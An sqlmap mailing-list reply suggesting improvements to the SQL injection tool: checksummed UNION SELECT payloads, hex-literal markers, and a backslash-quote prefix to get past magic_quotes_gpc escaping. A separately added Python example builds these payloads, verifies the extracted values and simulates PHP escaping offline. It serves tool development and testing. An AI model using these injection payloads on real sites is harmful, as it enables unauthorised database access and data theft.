Hello, Miroslav!

On Wed, 2011-08-10 at 10:48 +0200, Miroslav Stampar wrote:
> Hi Vladimir.
> 
> Thank you for your report. We'll do something about it. In the
> meantime you can experiment with --technique (other than U) or
> --start/--stop.
> 
> If there is no alternative please contact me privately and I'll make
> you a temporary patch.
> 
> That idea with end char is great. We'll try to use it in detection
> phase.
> 
> Kr
> 
> On 9.8.2011. 22:34, "Vladimir Rutsky" <rutsky.vladi...@gmail.com>
> wrote:
> 

Thank you for the fast reply! I managed to get the required information
without using sqlmap, so a temporary patch is not needed; let my letter
be a feature request for future versions of sqlmap.

In my case using --start/--stop helped a little: when I provide such
options it looks like sqlmap obtains the requested rows one by one, so
the limit of 10 items per page in the PHP script is never reached. But
anyway sqlmap incorrectly obtains not more than 10 columns from the
table, so I can't get a full table dump with it.

Below I assume that we are using the UNION SELECT technique.

1. How about, along with each item obtained from the database through
the SQL injection, also passing a checksum for that value? A UNION SELECT
SQL injection by its nature gives the ability to obtain values from the
database as text, because HTTP transfers text, so you can apply any
checksum to that text.

I suggest requesting the value through the SQL injection as follows (for MySQL):
  UNION SELECT 
    CONCAT(
      "start tag", 
      CAST(xxx AS CHAR), 
      MD5(CAST(xxx AS CHAR)), 
      "end tag")

Then if the obtained result contains text with a valid checksum between
the start and end tags, the output is definitely not corrupted or truncated.

2. I saw that in MySQL queries you use a lot of
"CONCAT(CHAR(58,46,121,118,58), ..." constructions. You can reduce their
length by using the hexadecimal representation of strings in MySQL, like
"CONCAT(0x3a2e79763a, ...".

3. I looked through xml/payloads.xml and didn't find prefixes for simple
WHERE clause injections on a PHP-powered host with magic_quotes_gpc
enabled [1]. Consider this example (PHP and MySQL):

mysql_query("SELECT a,b,c FROM table WHERE name='" . $_GET["id"] . "'");

When a single quote is passed through GET it is escaped: "'" -> "\'".
To work around such escaping it is enough to use a "\'" prefix in
sqlmap: "\'" -> "\\'".
I suggest using "\'" prefixes in sqlmap along with "'" prefixes.

[1] http://php.net/manual/en/security.magicquotes.php 

4. I tried to get familiar with the source code of sqlmap, but despite
its being written in Python it is quite hard to read and understand
without learning the main ideas and methods used in sqlmap. Is there any
developer documentation?

Doing SQL injection is an art in some sense, so sqlmap will never be
able to automatically hack every vulnerable site (but it will help with
most of them). I think sqlmap should provide an extendable and
easy-to-use library, divided into several independent modules, like a
module for testing a URL for vulnerabilities, a module for fetching data
from the foreign database once a "vector" for obtaining a single item
from the database is found, and so on.

P.S. I'm new to sqlmap and probably some of my thoughts described above
don't make sense in the context of this project, or some of my ideas
are already implemented. Hope this letter will be useful.


Best wishes,

Vladimir Rutsky
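Added example (my own Python, not code from sqlmap or from anyone in this thread) putting suggestions 1 to 3 of the mail above into working form: a UNION SELECT payload that wraps the fetched value between hex-encoded markers together with its MD5, a parser that accepts the value only when the checksum verifies (so a truncated or HTML-mangled response is rejected instead of trusted), and the magic_quotes_gpc prefix question, checked by scanning the resulting WHERE literal the way MySQL tokenizes it. The page fetch is replaced by a constructed stand-in (fake_page); the end marker, the function names and the sample values are assumptions, not sqlmap's. escape_quote_only() models the ' -> \' transform the mail describes, while addslashes() reproduces PHP's actual addslashes(), which magic_quotes_gpc applies and which also doubles backslashes, so both behaviours can be compared.

```python
"""Added example, not sqlmap code: the mail's suggestions 1-3 modelled offline."""
import hashlib
import re

# Assumed marker strings. The mail shows sqlmap's CHAR(58,46,121,118,58) (":.yv:");
# the end marker is invented for this example.
START_TAG = ":.yv:"
END_TAG = ":.kq:"


def mysql_hex(s):
    """Suggestion 2: MySQL hex literal, 0x3a2e79763a instead of CHAR(58,46,121,118,58)."""
    return "0x" + s.encode("utf-8").hex()


def mysql_char(s):
    """The longer CHAR(...) form the mail says sqlmap emits, kept to compare lengths."""
    return "CHAR(" + ",".join(str(b) for b in s.encode("utf-8")) + ")"


def union_payload(expr, prefix="'"):
    """Suggestion 1: select the value between markers, followed by its own MD5."""
    return (prefix + " UNION SELECT CONCAT(" + mysql_hex(START_TAG)
            + ",CAST(" + expr + " AS CHAR),MD5(CAST(" + expr + " AS CHAR)),"
            + mysql_hex(END_TAG) + ")-- ")


def checked_value(page):
    """Pull START_TAG<value><32 hex chars>END_TAG out of a response and return the
    value only if the MD5 verifies. None means the output is missing, truncated
    (end tag cut off) or altered by the page (HTML escaping, trimming, ...)."""
    m = re.search(re.escape(START_TAG) + r"(.*?)" + re.escape(END_TAG), page, re.S)
    if m is None:
        return None
    body = m.group(1)
    value, digest = body[:-32], body[-32:]
    if hashlib.md5(value.encode("utf-8")).hexdigest() != digest:
        return None
    return value


def fake_page(value, max_len=None):
    """Constructed stand-in for the PHP page: echoes the injected column, optionally
    cut at max_len characters the way a display-length limit would truncate it."""
    cell = START_TAG + value + hashlib.md5(value.encode("utf-8")).hexdigest() + END_TAG
    if max_len is not None:
        cell = cell[:max_len]
    return "<html><body><td>" + cell + "</td></body></html>"


def addslashes(s):
    """PHP addslashes(), which is what magic_quotes_gpc applies to GET/POST/COOKIE:
    single quote, double quote, backslash and NUL each get a leading backslash."""
    return "".join("\\0" if c == "\0" else ("\\" + c if c in "'\"\\" else c) for c in s)


def escape_quote_only(s):
    """Suggestion 3 as the mail describes the transform: only ' becomes \\' (assumption)."""
    return s.replace("'", "\\'")


def php_query(raw_id, escape):
    """The mysql_query() line from the mail, with $_GET["id"] run through `escape`."""
    return "SELECT a,b,c FROM table WHERE name='" + escape(raw_id) + "'"


def sql_outside_literal(query, marker="WHERE name='"):
    """Scan the single-quoted literal after `marker` the way MySQL does (backslash
    escapes the next character, '' is a literal quote) and return the SQL that
    follows its closing quote. Empty string: the payload never left the string."""
    i = query.index(marker) + len(marker)
    while i < len(query):
        c = query[i]
        if c == "\\":
            i += 2
        elif c == "'" and query[i + 1:i + 2] == "'":
            i += 2
        elif c == "'":
            return query[i + 1:]
        else:
            i += 1
    return ""


if __name__ == "__main__":
    print(mysql_char(START_TAG), "->", mysql_hex(START_TAG))
    print(checked_value(fake_page("5.1.41-3ubuntu12")),
          checked_value(fake_page("5.1.41-3ubuntu12", max_len=20)))
    for prefix, esc in (("'", addslashes), ("\\'", escape_quote_only), ("\\'", addslashes)):
        q = php_query(union_payload("version()", prefix), esc)
        print(repr(prefix), esc.__name__, "->", repr(sql_outside_literal(q)[:30]))
```

Run it directly to print the three checks. sql_outside_literal() returns whatever would execute as SQL once the quoted literal closes, so an empty string means the chosen prefix never escaped the string on that target; the third loop iteration shows that against a full addslashes() the "\'" prefix stays inside the literal, which is the check to make before relying on it.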



_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
